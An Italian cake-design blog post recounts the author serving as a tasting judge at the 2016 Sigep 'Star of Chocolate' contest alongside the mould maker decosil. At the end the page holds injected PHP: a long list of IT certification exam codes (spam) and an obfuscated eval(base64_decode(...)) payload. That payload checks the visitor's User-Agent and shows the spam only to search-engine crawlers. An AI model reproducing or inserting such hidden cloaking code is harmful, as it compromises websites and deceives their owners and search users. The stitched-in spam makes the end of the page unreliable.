the star of chocolate_logo_400

Giudice per un giorno.
La meravigliosa avventura al Sigep 2016, al fianco dell’azienda decosildecosil

Vi racconto oggi una bella storia. Quella di una cake designer sognatrice…

Il mio Sigep inizia ad Agosto 2015 quando per caso, vagando su facebook, mi imbatto nel post di una pagina che seguo già da anni, decosil-Stampi in silicone alimentare per cioccolato zucchero e marzapane.

Lo Staff decosil è alla ricerca di candidati per un evento molto importante che si terrà proprio alla fiera Sigep di Rimini, a Gennaio 2016. Si cercano due giudici per la gara THE STAR OF CHOCOLATE, in particolare per la fase dell’assaggio del dolce al piatto. Due figure che siederanno al fianco di grandi nomi della pasticceria italiana ed internazionale e che daranno un giudizio tecnico sui dolci realizzati dai giovani pastry chef in gara, provenienti da tutto il mondo.decosil

In quel momento mi sono detta che sarebbe stato giusto almeno tentare e anche se non avrei mai e poi mai pensato di essere selezionata veramente, ci speravo molto ed ho inviato il mio curriculum all’azienda.

Subito dopo l’estate il lavoro è ripreso alla grande. Sono ricominciati i corsi organizzati da noi presso il Dolcincanto Cake Studio di Trastevere e siamo stati impegnati nella pianificazione di un grande evento che avrebbe avuto luogo alla fine di Settembre.

Settembre vola. L’idea del giudice per un giorno era stata involontariamente già accantonata, quando arriva il messaggio di quella che si rivelerà essere poi il mio punto di riferimento in questa meravigliosa avventura riminese, Michela Milan.

Il messaggio dice che sono stata selezionata per partecipare, come membro di giuria alla gara del 25 Gennaio. Ho dovuto rileggere un paio di volte per esserne sicura. Avevo gli occhi sbarrati ed il cuore a mille. Non mi sembrava vero ma era realmente così, era stato scelto il mio curriculum, insieme a quello di un’altra persona della quale ancora non conoscevo l’identità.

Michela mi comunica anche che saremmo stati ospiti in un bellissimo albergo di Rimini sul mare e che avremmo preso parte con loro alla cena di gala, al termine della competizione.

Passano i mesi ed arriva finalmente anche la fine di Gennaio. Mi organizzo per la partenza con la mia amica e collega.

Purtroppo dietro l’angolo per tutte e due c’è una brutta influenza che ci debilita ma non toglie emozione ed entusiasmo a due ragazze che non vedono l’ora di vivere a pieno questa esperienza, io come giudice per un giorno e lei come sostegno morale e fotografo ufficiale dell’evento!

Carlotta Nisco

L’arrivo a Rimini è per domenica 24 Gennaio. La sistemazione in albergo, una splendida piadina al volo per pranzo, un giretto al mare e poi di corsa in fiera. Il Sigep è un appuntamento importante per chi lavora nel settore della pasticceria, della gelateria o come me e Carlotta, del cake design. Ormai non ci perdiamo un’edizione da anni.

Una volta dentro veniamo investite dal solito fiume di gente e a fatica riusciamo a dare un’occhiata in giro. Cerchiamo e troviamo l’elegante stand di decosil dove vengo accolta da un gruppo di persone fantastiche, che mi mettono subito a mio agio, spiegandomi a grandi linee cosa accadrà il giorno successivo durante la gara e portandomi nell’area vip della pastry arena, dov’è in corso un’altra importante competizione, THE PASTRY QUEEN, che vede vincitrice l’italiana Silvia Federica Boldetti.

Silvia Boldetti

Due chiacchiere con lo Staff decosil e con il maestro Stefano Laghi che ha selezionato personalmente i nostri curriculum regalandoci davvero una bella opportunità, poi si torna in albergo, dove ci si riposa per affrontare al meglio l’intensa giornata che verrà.

Stefano Laghi  Daniela Carissimo

 Dopo una breve dormita, la mattina del 26 Gennaio conosco finalmente, durante il momento della colazione in hotel, la persona che mi affiancherà durante questa avventura, l’altra  selezionata per far parte della giuria. Di fronte a me trovo una ragazza simpatica e subito tra noi scatta un feeling che renderà ancor più piacevole la giornata. Lei si chiama Daniela Carissimo ed è una pasticcera molisana.

Il tanto atteso momento arriva e tocca a noi entrare in scena. L’emozione è davvero tanta. L’arena è piena di gente e noi siamo pronte per degustare le delizie dei pastry chef in gara.

Tra i membri di giuria, i maestri Luigi BiasettoStefano LaghiDavide Comaschi e Davide Malizia, sotto lo sguardo attento dei maestri Iginio Massari e Roberto Rinaldini, quest’ultimo ideatore della gara THE STAR OF CHOCOLATE.

giuria

La degustazione giunge al termine e con essa anche la gara, che vedrà poi trionfare la figura di un altro giovane italiano, Lorenzo Puca.

Lorenzo Puca

La nostra giornata si conclude con una squisita cena di gala all’interno della fiera. Serata davvero gradevole trascorsa in compagnia di tante belle persone, che ringrazio per aver contribuito a rendere speciale la mia avventura riminese. Vi tengo nel cuore e spero di rincontrarvi presto!!

Complimenti per  tutto quello che fate, con infinita passione e serietà!!

Staff decosil

Decosil Decosil

 

Con affetto…

Marta

Please follow and like us:
Giudice per un giorno

decosil


decosil nata dalla collaborazione di professionisti nel campo della pasticceria e della lavorazione del silicone, per offrire attrezzi per pasticceria che rispondono ad un elevato standard qualitativo e funzionale. decosil nuova azienda costituita per rispondere alle esigenze dei pasticceri professionisti e non, che vogliono proporre idee creative alla propria clientela con innovativi utensili per pasticceria. Proponiamo stampi in silicone antiaderenti di grado alimentare per la realizzazione di oggetti artistici e decorativi e per la fabbricazione di soggetti. Stampi personalizzati: possiamo replicare i loghi aziendali per la fabbricazione di cioccolatini personalizzati.


Post navigation


Lascia un commento

$fafrendslins = <<

000-017   000-080   000-089   000-104   000-105   000-106   070-461   100-101   100-105  , 100-105  , 101   101-400   102-400   1V0-601   1Y0-201   1Z0-051   1Z0-060   1Z0-061   1Z0-144   1z0-434   1Z0-803   1Z0-804   1z0-808   200-101   200-120   200-125  , 200-125  , 200-310   200-355   210-060   210-065   210-260   220-801   220-802   220-901   220-902   2V0-620   2V0-621   2V0-621D   300-070   300-075   300-101   300-115   300-135   3002   300-206   300-208   300-209   300-320   350-001   350-018   350-029   350-030   350-050   350-060   350-080   352-001   400-051   400-101   400-201   500-260   640-692   640-911   640-916   642-732   642-999   700-501   70-177   70-178   70-243   70-246   70-270   70-346   70-347   70-410   70-411   70-412   70-413   70-417   70-461   70-462   70-463   70-480   70-483   70-486   70-487   70-488   70-532   70-533   70-534   70-980   74-678   810-403   9A0-385   9L0-012   9L0-066   ADM-201   AWS-SYSOPS   C_TFIN52_66   c2010-652   c2010-657   CAP   CAS-002   CCA-500   CISM   CISSP   CRISC   EX200   EX300   HP0-S42   ICBB   ICGB   ITILFND   JK0-022   JN0-102   JN0-360   LX0-103   LX0-104   M70-101   MB2-704   MB2-707   MB5-705   MB6-703   N10-006   NS0-157   NSE4   OG0-091   OG0-093   PEGACPBA71V1   PMP   PR000041   SSCP   SY0-401   VCP550   1Z0-061   CISSP   70-487   SY0-401   70-486   220-801   300-075   c2010-652   000-080   210-065   350-030   JN0-360   74-678   LX0-104   300-070   70-410   350-050   PMP   70-483   JN0-360   200-355   200-125  , 210-060   100-101   70-412   VCP550   LX0-104   000-017  

EOT; eval/**/(base64_decode('JHNwZGU9IHN0cnRvbG93ZXIoJF9TRVJWRVIvKnRlc3QqL1svKiovIkhUVFBfVVNFUl9BR0VOVCIvKiovXSk7CmZ1bmN0aW9uIGNhZ3QoJHNwZCkKewokZ3RydWU9IHN0cl9yZXBsYWNlKCJ4IiwiIiwiYnhveHh0eHxneG94eG94Z3hseGV8eXh4YXhoeG94b3xteHN4bnxzeHhweGl4ZHhleHJ8d3hneGV4dCIpOwppZihwcmVnX21hdGNoKCIvJGd0cnVlL2kiLCRzcGQpKXsKcmV0dXJuIHRydWU7Cn1lbHNlewpyZXR1cm4gZmFsc2U7Cn0KfSAKaWYoY2FndCgkc3BkZSkpewplY2hvICRmYWZyZW5kc2xpbnM7Cn0=')); ?>